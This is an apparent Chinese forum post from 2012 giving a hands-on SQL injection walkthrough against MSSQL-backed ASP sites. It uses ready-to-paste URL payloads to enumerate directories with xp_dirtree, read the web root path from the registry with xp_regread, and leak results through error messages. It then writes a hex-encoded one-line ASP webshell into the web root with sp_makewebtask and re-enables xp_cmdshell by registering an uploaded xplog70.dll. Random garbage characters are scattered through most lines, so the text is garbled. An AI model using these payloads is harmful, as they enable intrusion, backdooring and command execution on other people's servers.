好,我们exec master..xp_dirtree'd:/test'
- L) H7 k. h8 O+ P" g. ]假设我们在test里有两个文件夹test1和test2在test1里又有test3
2 n* }) ]. e) |) V3 }& |" V4 @" z! N结果显示
: e- V8 x' d2 ?3 X4 b1 W6 ~5 H: T9 ^. H. s
subdirectory depth
8 B8 R, \9 `' Y# l \ I2 B" M! ztest1 18 A& x9 K6 x8 y- \
test3 2 O: G0 B/ Y8 E3 c4 O: f) r# {: B3 c
test2 1; e+ l4 O2 r: Y# o# V# F
3 |1 r0 p" \' h# W/ e
哈哈发现没有那个depth就是目录的级数" d9 Q5 x: V# h' W+ |; z( @- b
ok了,知道怎么办了吧/ M( E* ?" a: y4 f6 L
# g* j& G' j; b$ F
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)-- 6 u: R' H: U. o/ L$ O3 {
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' --
! R7 }9 {7 `8 }http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-2 Y1 D6 w& t# o7 s' o- j& C
: C. Q6 |4 E6 z
只要加上id=1,就是第一级目录 。
3 h) @ K: V* y( X
0 ^! x8 x& ?2 Z* u- c$ f) U' j
通过注册表读网站路径:
/ c2 N3 x$ a$ H. u) j% v0 Z/ ]1 T5 w! C' A w- v
1.;create table [dbo].[cyfd] ([gyfd][char](255));% b9 f' a' t& L6 g1 g" e/ P" h4 Q
- ~8 k3 i% {/ p$ b5 z. K P2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--4 A4 I) k) x Q- d3 t! o
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
6 {2 [' n k9 o9 {' X+ {( D1 y
( J! _# O6 F/ l$ U7 ~5 c. ^9 P9 q3.and 1=(select count(*) from 临时表 where 临时字段名>1)
4 e# s) Q$ ^% Q" c1 B/ L1 zand 1=(select count(*) from cyfd where gyfd > 1)
8 h4 ~- f" A! u$ [# s# A这样IE报错,就把刚才插进去的Web路径的值报出来了5 [3 w+ x& a9 ]
! }- j9 ?- k! {) [# W4 V; v
4.drop table cyfd;-- 删除临时表
- o- `' a$ U) c0 ]& V' w2 X ?8 q) h' R3 y* X/ x
获得webshell方法:- G& b( v! | D
1.create table cmd (a image)-- \**cmd是创建的临时表
- i7 l" {7 ~" `% W7 n9 U" e# y8 }' G& L# }! u0 U
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
/ S5 g3 E2 R/ R( x5 |( X: I$ h3 d# t( Q
, E% ]5 s5 e: C X! p) _/ k9 \3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'4 T Q9 v; G8 D' t" I
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'7 }2 c' X& e: H: [1 \8 {
% l+ ]9 B+ z; [; B# ~* G4 y4.drop table cmd;-- 删除cmd临时表7 Z6 F" T; `. C4 v, ?) ]1 g+ h
! i6 U% n' |; } g- J4 w
恢复xp_cmdshell方法之一:' {% n5 T' N( k" M
我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:& d3 d6 N8 A9 [) Z9 V* A
http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
0 w2 y, R p9 E: I( R8 v2 j6 `恢复,支持绝对路径的恢复哦。:) ~' n1 u" I' }1 u- T
|
发表于 2012-9-13 17:20:30
收藏
支持
反对